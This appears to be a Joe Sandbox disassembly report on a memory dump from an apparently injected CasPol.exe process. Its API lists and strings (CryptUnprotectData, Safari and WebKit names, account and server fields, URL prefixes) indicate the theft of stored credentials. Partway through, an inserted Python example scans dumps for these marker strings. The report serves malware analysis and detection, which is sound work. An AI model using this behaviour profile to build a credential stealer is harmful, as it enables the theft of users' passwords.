                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Open
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
• Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
• Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
APIs
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
• Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
• Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
• Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
APIs
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
• Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
APIs
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
• Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
• Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
APIs
• GetVersionExW.KERNEL32(?), ref: 004173BE
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
• Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
• Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
• Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 2929817778-1134094380
• Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
• Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
• Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
• Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
• Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
• Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
• Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
• Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
• Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
• Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
• Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
• Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
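The strings this entry lists (the crash-dialog format string and the {Unknown} module placeholder), together with the ftp://, http:// and https:// prefixes and the com.apple.* names from the entries above, are handled through _snwprintf, wcscpy and _wcsnicmp, so the binary keeps them as UTF-16LE; an ASCII-only grep of the CasPol memory dump will not find them. The Python below is an example added here, not code from the Joe Sandbox report or from the sample: it scans a constructed buffer for those strings as UTF-16LE and as ASCII so the difference is visible. The buffer contents, the marker names and the function names are assumptions for illustration; the crash-dialog string is shown on the page with its line breaks collapsed, so only fragments that are certainly contiguous are matched.

```python
"""Scan a memory dump for the wide-character marker strings listed in this report.

Added example, not code from the Joe Sandbox report or from the sample. The
marker text is copied from the report's "Strings" entries; the sample buffer,
the marker names and the function names are constructed for illustration.
"""

# The report shows these strings next to _snwprintf / _wcsnicmp / wcscpy, so the
# binary keeps them as UTF-16LE. The crash-dialog format string is displayed on
# the page with its line breaks collapsed, so only fragments that are certainly
# contiguous are used here.
MARKERS = {
    "crash_dialog": "Exception %8.8X at address %8.8X in module %s",
    "crash_registers": "Registers: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X",
    "unknown_module": "{Unknown}",
    "url_ftp": "ftp://",
    "url_http": "http://",
    "url_https": "https://",
    "safari": "com.apple.Safari",
    "webkit": "com.apple.WebKit2WebProcess",
}


def scan_for_markers(dump: bytes, encoding: str = "utf-16-le",
                     markers: dict = MARKERS) -> dict:
    """Return {marker_name: [byte offsets]} for every marker found in `dump`
    when encoded with `encoding`. Markers that never occur are omitted.
    Offsets are byte positions; no 2-byte alignment is assumed for wide hits."""
    hits = {}
    for name, text in markers.items():
        needle = text.encode(encoding)
        offsets = []
        pos = dump.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = dump.find(needle, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


def build_sample_dump() -> bytes:
    """Constructed sample buffer (not a real dump from this analysis)."""
    return b"".join([
        b"\x00" * 16,
        "Exception %8.8X at address %8.8X in module %s\n".encode("utf-16-le"),
        b"\x00" * 8,
        "https://".encode("utf-16-le"),
        b"\x00" * 8,
        b"ftp://",          # narrow copy: a wide-only scan must not report it
        b"\x00" * 8,
        "{Unknown}".encode("utf-16-le"),
    ])


if __name__ == "__main__":
    dump = build_sample_dump()
    print("UTF-16LE hits:", scan_for_markers(dump))
    print("ASCII hits:   ", scan_for_markers(dump, "ascii"))
```

Run against a real dump with `scan_for_markers(open(path, "rb").read())`; the wide scan reports the crash-dialog, https:// and {Unknown} strings while the ASCII scan only sees the narrow ftp:// copy, which is the gap a plain `strings`-style search leaves.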
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
